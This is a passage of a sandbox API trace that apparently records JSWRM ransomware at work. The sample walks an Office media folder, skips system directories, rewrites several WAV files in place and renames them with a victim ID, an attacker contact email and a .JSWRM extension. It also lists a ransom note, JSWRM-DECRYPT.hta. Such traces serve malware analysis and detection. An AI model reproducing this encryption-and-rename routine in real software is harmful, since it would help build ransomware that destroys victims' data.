ftCreationTime.dwLowDateTime=0x1af7c22b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1af7c22b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1afa24f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4be2, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="DRUMROLL.WAV", cAlternateFileName="")) returned 1 [0134.936] lstrcmpiW (lpString1="DRUMROLL.WAV", lpString2=".") returned 1 [0134.936] lstrcmpiW (lpString1="DRUMROLL.WAV", lpString2="..") returned 1 [0134.936] lstrcmpiW (lpString1="DRUMROLL.WAV", lpString2="...") returned 1 [0134.936] lstrcmpiW (lpString1="DRUMROLL.WAV", lpString2="windows") returned -1 [0134.936] lstrcmpiW (lpString1="DRUMROLL.WAV", lpString2="recovery") returned -1 [0134.936] lstrcmpiW (lpString1="DRUMROLL.WAV", lpString2="perflogs") returned -1 [0134.936] lstrcmpiW (lpString1="DRUMROLL.WAV", lpString2="documents and settings") returned 1 [0134.936] lstrcmpiW (lpString1="DRUMROLL.WAV", lpString2="$RECYCLE.BIN") returned 1 [0134.936] lstrcmpiW (lpString1="DRUMROLL.WAV", lpString2="system volume information") returned -1 [0134.936] lstrcmpiW (lpString1="DRUMROLL.WAV", lpString2="msocache") returned -1 [0134.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRUMROLL.WAV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0134.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRUMROLL.WAV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DRUMROLL.WAV", lpUsedDefaultChar=0x0) returned 12 [0134.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRUMROLL.WAV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0134.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRUMROLL.WAV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DRUMROLL.WAV", lpUsedDefaultChar=0x0) returned 12 [0134.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\DRUMROLL.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\drumroll.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.938] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19426) returned 1 [0134.938] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.938] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4be0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x4be0, lpOverlapped=0x0) returned 1 [0134.941] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.941] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4be0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x4be0, lpOverlapped=0x0) returned 1 [0134.941] CloseHandle (hObject=0x238) returned 1 [0134.941] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\DRUMROLL.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\drumroll.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\DRUMROLL.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\drumroll.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.942] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1af7c22b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1af7c22b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1afa24f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5c20, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="EXPLODE.WAV", cAlternateFileName="")) returned 1 [0134.942] lstrcmpiW (lpString1="EXPLODE.WAV", lpString2=".") returned 1 [0134.942] lstrcmpiW (lpString1="EXPLODE.WAV", lpString2="..") returned 1 [0134.942] lstrcmpiW (lpString1="EXPLODE.WAV", lpString2="...") returned 1 [0134.942] lstrcmpiW (lpString1="EXPLODE.WAV", lpString2="windows") returned -1 [0134.942] lstrcmpiW (lpString1="EXPLODE.WAV", lpString2="recovery") returned -1 [0134.942] lstrcmpiW (lpString1="EXPLODE.WAV", lpString2="perflogs") returned -1 [0134.942] lstrcmpiW (lpString1="EXPLODE.WAV", lpString2="documents and settings") returned 1 [0134.942] lstrcmpiW (lpString1="EXPLODE.WAV", lpString2="$RECYCLE.BIN") returned 1 [0134.942] lstrcmpiW (lpString1="EXPLODE.WAV", lpString2="system volume information") returned -1 [0134.942] lstrcmpiW (lpString1="EXPLODE.WAV", lpString2="msocache") returned -1 [0134.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXPLODE.WAV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0134.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXPLODE.WAV", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXPLODE.WAV", lpUsedDefaultChar=0x0) returned 11 [0134.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXPLODE.WAV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0134.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXPLODE.WAV", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXPLODE.WAV", lpUsedDefaultChar=0x0) returned 11 [0134.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\EXPLODE.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\explode.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.944] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=23584) returned 1 [0134.944] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.944] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5c20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x5c20, lpOverlapped=0x0) returned 1 [0134.950] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.950] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5c20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x5c20, lpOverlapped=0x0) returned 1 [0134.950] CloseHandle (hObject=0x238) returned 1 [0134.950] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\EXPLODE.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\explode.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\EXPLODE.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\explode.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.951] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1af7c22b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1af7c22b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1afa24f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfbc, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="HAMMER.WAV", cAlternateFileName="")) returned 1 [0134.951] lstrcmpiW (lpString1="HAMMER.WAV", lpString2=".") returned 1 [0134.951] lstrcmpiW (lpString1="HAMMER.WAV", lpString2="..") returned 1 [0134.951] lstrcmpiW (lpString1="HAMMER.WAV", lpString2="...") returned 1 [0134.951] lstrcmpiW (lpString1="HAMMER.WAV", lpString2="windows") returned -1 [0134.951] lstrcmpiW (lpString1="HAMMER.WAV", lpString2="recovery") returned -1 [0134.951] lstrcmpiW (lpString1="HAMMER.WAV", lpString2="perflogs") returned -1 [0134.951] lstrcmpiW (lpString1="HAMMER.WAV", lpString2="documents and settings") returned 1 [0134.951] lstrcmpiW (lpString1="HAMMER.WAV", lpString2="$RECYCLE.BIN") returned 1 [0134.951] lstrcmpiW (lpString1="HAMMER.WAV", lpString2="system volume information") returned -1 [0134.951] lstrcmpiW (lpString1="HAMMER.WAV", lpString2="msocache") returned -1 [0134.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HAMMER.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0134.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HAMMER.WAV", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HAMMER.WAV", lpUsedDefaultChar=0x0) returned 10 [0134.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HAMMER.WAV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0134.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HAMMER.WAV", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HAMMER.WAV", lpUsedDefaultChar=0x0) returned 10 [0134.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\HAMMER.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\hammer.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.952] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4028) returned 1 [0134.952] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.952] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xfb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xfb0, lpOverlapped=0x0) returned 1 [0134.954] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.954] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xfb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xfb0, lpOverlapped=0x0) returned 1 [0134.954] CloseHandle (hObject=0x238) returned 1 [0134.954] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\HAMMER.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\hammer.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\HAMMER.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\hammer.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.958] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4705ba75, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4705ba75, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4705ba75, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0134.958] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0134.958] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0134.958] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0134.958] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0134.958] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0134.958] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0134.958] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0134.958] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0134.958] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0134.958] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0134.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0134.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0134.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0134.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0134.958] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1af7c22b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1af7c22b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1af7c22b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72d, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LASER.WAV", cAlternateFileName="")) returned 1 [0134.959] lstrcmpiW (lpString1="LASER.WAV", lpString2=".") returned 1 [0134.959] lstrcmpiW (lpString1="LASER.WAV", lpString2="..") returned 1 [0134.959] lstrcmpiW (lpString1="LASER.WAV", lpString2="...") returned 1 [0134.959] lstrcmpiW (lpString1="LASER.WAV", lpString2="windows") returned -1 [0134.959] lstrcmpiW (lpString1="LASER.WAV", lpString2="recovery") returned -1 [0134.959] lstrcmpiW (lpString1="LASER.WAV", lpString2="perflogs") returned -1 [0134.959] lstrcmpiW (lpString1="LASER.WAV", lpString2="documents and settings") returned 1 [0134.959] lstrcmpiW (lpString1="LASER.WAV", lpString2="$RECYCLE.BIN") returned 1 [0134.959] lstrcmpiW (lpString1="LASER.WAV", lpString2="system volume information") returned -1 [0134.959] lstrcmpiW (lpString1="LASER.WAV", lpString2="msocache") returned -1 [0134.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LASER.WAV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0134.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LASER.WAV", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LASER.WAV", lpUsedDefaultChar=0x0) returned 9 [0134.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LASER.WAV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0134.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LASER.WAV", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LASER.WAV", lpUsedDefaultChar=0x0) returned 9 [0134.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LASER.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\laser.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.960] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1837) returned 1 [0134.960] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.960] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x720, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x720, lpOverlapped=0x0) returned 1 [0134.961] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.961] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x720, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x720, lpOverlapped=0x0) returned 1 [0134.962] CloseHandle (hObject=0x238) returned 1 [0134.962] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LASER.WAV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\laser.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LASER.WAV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\laser.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.963] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1af7c22b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1af7c22b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1af7c22b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17c7a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_abbrdialtone.wav", cAlternateFileName="LYNC_A~3.WAV")) returned 1 [0134.963] lstrcmpiW (lpString1="LYNC_abbrdialtone.wav", lpString2=".") returned 1 [0134.963] lstrcmpiW (lpString1="LYNC_abbrdialtone.wav", lpString2="..") returned 1 [0134.963] lstrcmpiW (lpString1="LYNC_abbrdialtone.wav", lpString2="...") returned 1 [0134.963] lstrcmpiW (lpString1="LYNC_abbrdialtone.wav", lpString2="windows") returned -1 [0134.963] lstrcmpiW (lpString1="LYNC_abbrdialtone.wav", lpString2="recovery") returned -1 [0134.963] lstrcmpiW (lpString1="LYNC_abbrdialtone.wav", lpString2="perflogs") returned -1 [0134.963] lstrcmpiW (lpString1="LYNC_abbrdialtone.wav", lpString2="documents and settings") returned 1 [0134.963] lstrcmpiW (lpString1="LYNC_abbrdialtone.wav", lpString2="$RECYCLE.BIN") returned 1 [0134.963] lstrcmpiW (lpString1="LYNC_abbrdialtone.wav", lpString2="system volume information") returned -1 [0134.963] lstrcmpiW (lpString1="LYNC_abbrdialtone.wav", lpString2="msocache") returned -1 [0134.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_abbrdialtone.wav", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0134.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_abbrdialtone.wav", cchWideChar=21, lpMultiByteStr=0x241330, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_abbrdialtone.wav", lpUsedDefaultChar=0x0) returned 21 [0134.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_abbrdialtone.wav", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0134.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_abbrdialtone.wav", cchWideChar=21, lpMultiByteStr=0x240ef8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_abbrdialtone.wav", lpUsedDefaultChar=0x0) returned 21 [0134.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.963] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_abbrdialtone.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_abbrdialtone.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.964] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=97402) returned 1 [0134.964] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.964] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x17c70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x17c70, lpOverlapped=0x0) returned 1 [0134.972] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.972] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x17c70, 